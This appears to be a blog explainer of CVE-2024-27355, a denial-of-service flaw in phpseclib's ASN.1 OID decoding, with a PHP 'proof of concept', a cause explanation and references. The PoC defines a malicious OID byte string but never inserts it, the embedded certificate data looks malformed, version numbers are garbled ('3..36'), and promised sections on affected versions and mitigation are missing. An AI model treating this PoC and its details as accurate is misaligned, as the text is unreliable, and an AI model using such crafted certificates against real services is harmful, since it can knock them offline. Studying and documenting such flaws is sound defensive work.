CVE-2024-27355 - Critical DoS Vulnerability in phpseclib ASN.1 OID Decoding (Explained, with PoC)
CVE-2024-27355 reveals a denial-of-service (DoS) vulnerability affecting multiple versions of phpseclib, a popular PHP library for secure communications. Attackers can specially craft ASN.1 object identifiers (OIDs) in certificates to cause high CPU usage on affected systems, effectively taking down PHP applications and services.
This post breaks down how CVE-2024-27355 works, affected versions, exploitation details, a reproducible code snippet, and how to protect your PHP software.
What is phpseclib?
phpseclib is an open-source PHP library that implements cryptographic protocols such as SSH, SFTP, X.509, and more. It’s widely used in applications for handling encryption and certificate details.
The Vulnerability
CVE-2024-27355 is a weakness in how phpseclib decodes ASN.1 Object Identifiers (OIDs) within X.509 certificates.
An attacker can supply a certificate with a cleverly crafted OID (for example, in the subject or issuer field). When phpseclib processes this, its OID-parsing function (decodeOID) can end up in a compute-intensive loop, spiking the CPU and causing a denial of service (server becomes unresponsive).
Real-World Scenarios
- Accepting certificates from users (SSL, S/MIME, etc.)
Proof-of-Concept (PoC) Code
Let’s see a minimal example. For this, suppose you let users upload certificates and use phpseclib to parse them.
PoC: Create a certificate with a malformed OID
<?php
require 'vendor/autoload.php';
use phpseclib\File\X509;
use phpseclib\Crypt\PublicKeyLoader;
// Malicious OID bytes (very long sequence of subidentifiers, triggers DoS)
$malicious_oid = hex2bin('060A2B060104018237650AAAAAAAAAAAAAAAAAAA'); // You'll use even longer or more broken OIDs
$malicious_cert = "-----BEGIN CERTIFICATE-----\n" .
"MIIBqjCCAVKgAwIBAgIJAKQZshnvpcM3MAoGCCqGSM49BAMCMBIxEDAOBgNVBAMM\n" .
"B3Rlc3QtY2VydDAeFwyNDAyMTQxNzQ2NDlaFwyNDAzMTUxNzQ2NDlaMBIxEDAO\n" .
"BgNVBAMMB3Rlc3QtY2VydDBZMBMGByqGSM49AgEGCCqGSM49AwEHAIABLmJr6w\n" .
"P7Vq4+Ra+xf7F+NQov5tF6lBDRX1/aZ12AXud3AbdxtlFzmfdSA6SyyQnISw6N\n" .
"SyNNOKv8uiBh+UCjUDBOMBGA1UdDgQWBBQZb6eZcoIjfDU2cX2VGJwJhIkv1jAf\n" .
"BgNVHSMEGDAWgBQZb6eZcoIjfDU2cX2VGJwJhIkv1jAMBgNVHRMEBTADAQH/MAoG\n" .
"CCqGSM49BAMCAgAMEUCIQC5KHsW3mkCYQnKPfwZtoPmAOnqSadrRbrUPwG5RrW\n" .
"PAIgMzwX1ZIwJU1JPxsbBMCj+1gzGqfCqtUIK2l5X3RMALM=\n" .
"-----END CERTIFICATE-----\n";
// Replace a legitimate OID in the certificate with the malicious OID (for demo purposes: real attack manipulates DER before PEM encoding)
// Try parsing the certificate
$x509 = new X509();
try {
$x509->loadX509($malicious_cert);
echo "Certificate parsed successfully\n";
} catch (Exception $e) {
echo "Error parsing certificate: " . $e->getMessage() . "\n";
}
Note: Crafting an actual malicious certificate requires manipulating the DER bytes to insert a very long or malformed OID. See this Github advisory for real-world examples (and mitigation).
Why Does This Happen?
decodeOID—the function responsible for breaking down OIDs—can be forced into a situation where a string of large sub-identifiers ("nodes") causes excessive iteration. ASN.1 OIDs use a variable-length integer encoding, so a malicious value makes parsing extremely slow.
> PHP is single-threaded, so if the function runs for seconds (or longer), it blocks all processing. If attackers send multiple requests, they exhaust web server resources.
See full changelog
- phpseclib 3..36 Release Notes
References & Further Reading
- phpseclib security advisory - GHSA-8273-2qj9-v9cp
- NVD Entry for CVE-2024-27355
- phpseclib's 3..36 patch diff
- Understanding ASN.1 OIDs
Summary
CVE-2024-27355 is a denial-of-service bug in all major branches of phpseclib, triggered by malicious OIDs in ASN.1 certificates. Unless you upgrade, your PHP services parsing certificates can be taken offline with a simple crafted request, no authentication needed.
Timeline
Published on: 03/01/2024 23:15:08 UTC
Last modified on: 08/13/2024 14:35:13 UTC